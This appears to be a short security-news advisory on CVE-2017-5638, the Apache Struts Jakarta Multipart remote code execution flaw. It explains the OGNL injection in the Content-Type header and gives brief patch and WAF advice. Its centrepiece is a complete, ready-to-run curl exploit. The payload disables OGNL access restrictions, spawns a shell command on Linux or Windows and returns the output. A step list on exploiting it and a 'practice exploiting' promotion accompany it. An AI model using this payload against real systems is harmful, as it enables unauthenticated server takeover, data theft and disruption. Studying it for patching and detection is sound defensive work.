Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious Content-Type header is sent with a file upload request. The parser incorrectly evaluates the `Content-Type` value, attempting to process it as an Object-Graph Navigation Language (OGNL) expression. An attacker can craft a request where the Content-Type header contains a malicious OGNL expression. Since OGNL expressions are executed on the server side with significant privileges, this allows for remote code execution. The vulnerability is exploitable without any authentication if the affected endpoint is exposed, making it highly dangerous. The root cause is the exception handler’s failure to properly sanitize user input before passing it to the OGNL engine.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-server.com/upload.action`

How Exploit:

Craft malicious HTTP request.

Target vulnerable Struts endpoint.

Execute OGNL expressions.

Achieve remote code execution.

Protection from this CVE

Apply official patch.

Upgrade Struts version.

Use input validation.

Deploy a WAF.

Impact:

Full server compromise.

Data theft.

Service disruption.

Arbitrary code execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top